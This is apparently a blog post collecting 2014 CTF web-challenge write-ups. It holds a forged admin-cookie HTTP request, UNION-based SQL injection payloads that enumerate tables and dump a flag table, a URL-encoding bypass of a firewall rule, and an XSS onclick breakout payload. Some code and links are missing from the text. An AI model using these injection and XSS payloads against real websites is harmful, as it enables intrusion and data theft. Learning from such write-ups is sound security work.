Monday, May 12, 2014

Hacktrick 2014 - ORION - Web Write-up

on this challenge we were supposed to login as admin to a page, which we can register and login with our registered credentials. first we looked for guessable sessionid, but it was not :(. Then tried setting some cookies as admin, isadmin. It did not work neither. Then we get a hint that the server was using mongodb after that everything was easy we just make a nosqli request and became admin. To guess the username we used the registration system. The request made by netcat was this:

POST /index.php HTTP/1.1
Connection: keep-alive
Content-Length: 32
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.132 Safari/537.36
Content-Type: application/x-www-form-urlencoded
DNT: 1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: admin=true; isadmin=true; PHPSESSID=123 

after that we just refreshed the page :)

Hacktrick 2014 - Iron Throne - Web Write-up

This challenge was about SQLi, system was searching the input we gave by using a statement like this:
select * from X where Y like 'input%'
so we first used an input like this to gather the table names:
asdf' union select table_name, 2 from information_schema.tables where '1'='1' or 'a'='
which end up with a query as:
select * from X where Y like 'asdf' union select table_name, 2 from information_schema.tables where '1'='1' or 'a'='%'
and what we get was:
flag         2
news 2
so we pulled from the table named flag like this:
asdf' union select *, 2 from flag where '1'='1' or 'a'='
select * from X where Y like 'asdf' union select *, 2 from flag where '1'='1' or 'a'=' %'
and voila:

Hacktrick 2014 - Fuel - Web Write-up

On this quest we need to reach a URL on the server, but iptables was set to prevent anyone from reaching it so the aim was to bypass it. The hint was pointing to a tool called 'fragroute' but we could not make it work and started to look new ways and asked ourselves why not url encode??

send a request like this on netcat:
nc 80
GET /%61dministrator.html
and received:
<!DOCTYPE html>
Key : G1mm3fu3lG1mm3fir3

Hacktrick 2014 - KHALEESI - Web Write-up

On this challenge we were given a page with khaleesi on it :D the exact page source code:

And the image of course :D :

As you can see from the source code we were given an obfuscated javascript code. First we decoded the first array and come up with those strings:
0 Yea I know I'm so hot and that can be cause lack of attention<3
1 log
2 Oh my dragons! My beautiful dragons...
3 abcdef1234567890
4 flag
5 U2FsdGVkX1/d+AKV6nrvKw0mwepr2/LIeS0sW4EveGKEv4cinrxne8MiSUEozt3DAYt25i1u7m4=
6 setItem
7 use strict
8 Missing secret!
9 secret
10 stringify
11 encrypt
12 TripleDES
13 decrypt
14 enc
15 parse
16 prototype
17 getItem
18 localStorage
19 remove
20 removeItem
21 -
22 split
23 substring
24 hash
25 Flag:
26 get
Then we followed the code till the end, through the end you shall see some if checks and an alert using the 25th element of array which is flag! so we met the conditions necessary in the if statements and make the link like this:

and there comes the flag:

Hacktrick 2014 - Domify - Web Write-up

In this problem server was using the url we gave him directly in a onclick event of a hyperlink, which would leave a great xss vuln.

Onclick event was something like this:
<a href="#" onclick="someRedirectFunc('1337', 'index.php?click=');">

so i changed the link into this:');window.stop();alert('sex

and then the event change into something bad very very bad :P :
<a href="#" onclick="someRedirectFunc('1337', 'index.php?click=');window.stop();alert('sex');">

The aim was to make the payload work on as much browser as possible, and most of the browsers were redirecting before or after the alert so we put the 'window.stop();' to stop the redirection but newer versions of IE has something called 'XSS Filter' which turned every paranthesis in the url into #. We did not bypass the filter but learned there is a way by using the data uris to pass that kind of filtering.